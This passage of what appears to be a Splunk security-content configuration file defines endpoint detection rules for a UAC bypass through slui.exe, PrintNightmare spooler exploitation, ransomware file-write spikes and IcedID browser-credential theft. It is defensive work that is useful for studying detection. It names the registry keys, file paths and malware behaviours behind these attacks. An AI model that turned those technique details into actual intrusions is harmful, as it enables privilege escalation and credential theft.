data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.notable.param.rule_title = Single Letter Process On Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest, Processes.user, Processes.process, Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | eval process_name_length = len(process_name), endExe = if(substr(process_name, -4) == ".exe", 1, 0) | search process_name_length=5 AND endExe=1 | table count, firstTime, lastTime, dest, user, process, process_name | `single_letter_process_on_endpoint_filter` [ESCU - SLUI RunAs Elevated - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives should be present as this is not commonly used by legitimate applications. action.escu.creation_date = 2021-05-13 action.escu.modification_date = 2021-05-13 action.escu.confidence = high action.escu.full_search_name = ESCU - SLUI RunAs Elevated - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = A slui process $process_name$ with elevated commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SLUI RunAs Elevated - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, elevating access using the `-verb runas` function. This particular bypass utilizes a registry key/value. Identified by two sources, the registry keys are `HKCU\Software\Classes\exefile\shell` and `HKCU\Software\Classes\launcher.Systemsettings\Shell\open\command`. To simulate this behavior, multiple POC are available. The analytic identifies the use of `runas` by `slui.exe`. action.notable.param.rule_title = SLUI RunAs Elevated action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=slui.exe (Processes.process=*-verb* Processes.process=*runas*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `slui_runas_elevated_filter` [ESCU - SLUI Spawning a Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have lead to the bypass. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have lead to the bypass. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Certain applications may spawn from `slui.exe` that are legitimate. Filtering will be needed to ensure proper monitoring. action.escu.creation_date = 2021-05-13 action.escu.modification_date = 2021-05-13 action.escu.confidence = high action.escu.full_search_name = ESCU - SLUI Spawning a Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DarkSide Ransomware", "Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = A slui process $parent_process_name$ spawning child process $process_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SLUI Spawning a Process - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the Microsoft Software Licensing User Interface Tool, `slui.exe`, spawning a child process. This behavior is associated with publicly known UAC bypass. `slui.exe` is commonly associated with software updates and is most often spawned by `svchost.exe`. The `slui.exe` process should not have child processes, and any processes spawning from it will be running with elevated privileges. During triage, review the child process and additional parallel processes. Identify any file modifications that may have lead to the bypass. action.notable.param.rule_title = SLUI Spawning a Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=slui.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `slui_spawning_a_process_filter` [ESCU - Spike in File Writes - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The search looks for a sharp increase in the number of files written to a particular host action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for a sharp increase in the number of files written to a particular host action.escu.how_to_implement = In order to implement this search, you must populate the Endpoint file-system data model node. This is typically populated via endpoint detection and response product, such as Carbon Black or endpoint data sources such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the file system. action.escu.known_false_positives = It is important to understand that if you happen to install any new applications on your hosts or are copying a large number of files, you can expect to see a large increase of file modifications. action.escu.creation_date = 2020-03-16 action.escu.modification_date = 2020-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Spike in File Writes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Spike in File Writes - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.action=created by _time span=1h, Filesystem.dest | `drop_dm_object_name(Filesystem)` | eventstats max(_time) as maxtime | stats count as num_data_samples max(eval(if(_time >= relative_time(maxtime, "-1d@d"), count, null))) as "count" avg(eval(if(_time upperBound) AND num_data_samples >=20, 1, 0) | search isOutlier=1 | `spike_in_file_writes_filter` [ESCU - Spoolsv Spawning Rundll32 - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives have been identified. There are limited instances where `rundll32.exe` may be spawned by a legitimate print driver. action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Spoolsv Spawning Rundll32 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = $parent_process_name$ has spawned $process_name$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Spoolsv Spawning Rundll32 - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious child process, `rundll32.exe`, with no command-line arguments being spawned from `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to spawn a process. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.notable.param.rule_title = Spoolsv Spawning Rundll32 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe `process_rundll32` by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_spawning_rundll32_filter` [ESCU - Spoolsv Suspicious Loaded Modules - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect suspicious loading of dll in specific path relative to printnightmare exploitation. In this search we try to detect the loaded modules made by spoolsv.exe after the exploitation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect suspicious loading of dll in specific path relative to printnightmare exploitation. In this search we try to detect the loaded modules made by spoolsv.exe after the exploitation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Spoolsv Suspicious Loaded Modules - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = $Image$ with process id $ProcessId$ has loaded a driver from $ImageLoaded$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Spoolsv Suspicious Loaded Modules - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect suspicious loading of dll in specific path relative to printnightmare exploitation. In this search we try to detect the loaded modules made by spoolsv.exe after the exploitation. action.notable.param.rule_title = Spoolsv Suspicious Loaded Modules action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 Image ="*\\spoolsv.exe" ImageLoaded="*\\Windows\\System32\\spool\\drivers\\x64\\*" ImageLoaded = "*.dll" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | rename Computer as dest | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter` [ESCU - Spoolsv Suspicious Process Access - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious behavior related to PrintNightmare, or CVE-2021-34527 previously (CVE-2021-1675), to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler Vulnerability to elevate privilege. This detection is to look for suspicious process access made by the spoolsv.exe that may related to the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a suspicious behavior related to PrintNightmare, or CVE-2021-34527 previously (CVE-2021-1675), to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler Vulnerability to elevate privilege. This detection is to look for suspicious process access made by the spoolsv.exe that may related to the attack. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with process access event where SourceImage, TargetImage, GrantedAccess and CallTrace executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances of spoolsv.exe. action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Spoolsv Suspicious Process Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = $SourceImage$ was GrantedAccess open access to $TargetImage$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "ProcessID", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Spoolsv Suspicious Process Access - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious behavior related to PrintNightmare, or CVE-2021-34527 previously (CVE-2021-1675), to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler Vulnerability to elevate privilege. This detection is to look for suspicious process access made by the spoolsv.exe that may related to the attack. action.notable.param.rule_title = Spoolsv Suspicious Process Access action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=10 SourceImage = "*\\spoolsv.exe" CallTrace = "*\\Windows\\system32\\spool\\DRIVERS\\x64\\*" TargetImage IN ("*\\rundll32.exe", "*\\spoolsv.exe") GrantedAccess = 0x1fffff | stats count min(_time) as firstTime max(_time) as lastTime by dest SourceImage TargetImage GrantedAccess CallTrace EventCode ProcessID| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_process_access_filter` [ESCU - Spoolsv Writing a DLL - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = Unknown. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Spoolsv Writing a DLL - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = $process_name$ has been identified writing dll's to $file_path$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Spoolsv Writing a DLL - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously (CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.notable.param.rule_title = Spoolsv Writing a DLL action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=spoolsv.exe by _time Processes.process_guid Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path="*\\spool\\drivers\\x64\\*" Filesystem.file_name="*.dll" by _time Filesystem.dest Filesystem.process_guid Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process_guid process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name process_guid | `spoolsv_writing_a_dll_filter` [ESCU - Spoolsv Writing a DLL - Sysmon - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously(CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously(CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used. action.escu.known_false_positives = Limited false positives. Filter as needed. action.escu.creation_date = 2021-07-01 action.escu.modification_date = 2021-07-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Spoolsv Writing a DLL - Sysmon - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"] action.risk = 1 action.risk.param._risk_message = $process_name$ has been identified writing dll's to $file_path$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Spoolsv Writing a DLL - Sysmon - Rule action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 previously(CVE-2021-1675) or PrintNightmare. Typically, this is not normal behavior for `spoolsv.exe` to write a `.dll`. Current POC code used will write the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for source of exploitation. Capture any additional file modification events. action.notable.param.rule_title = Spoolsv Writing a DLL - Sysmon action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=11 process_name=spoolsv.exe file_path="*\\spool\\drivers\\x64\\*" file_name=*.dll | stats count min(_time) as firstTime max(_time) as lastTime by dest, UserID, process_name, file_path, file_name, TargetFilename, process_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_writing_a_dll___sysmon_filter` [ESCU - Sqlite Module In Temp Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious file creation of sqlite3.dll in %temp% folder. This behavior was seen in IcedID malware where it download sqlite module to parse browser database like for chrome or firefox to stole browser information related to bank, credit card or credentials. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious file creation of sqlite3.dll in %temp% folder. This behavior was seen in IcedID malware where it download sqlite module to parse browser database like for chrome or firefox to stole browser information related to bank, credit card or credentials. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-08-03 action.escu.modification_date = 2021-08-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Sqlite Module In Temp Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID"] action.risk = 1 action.risk.param._risk_message = Process $process_name$ create a file $file_name$ in host $dest$ 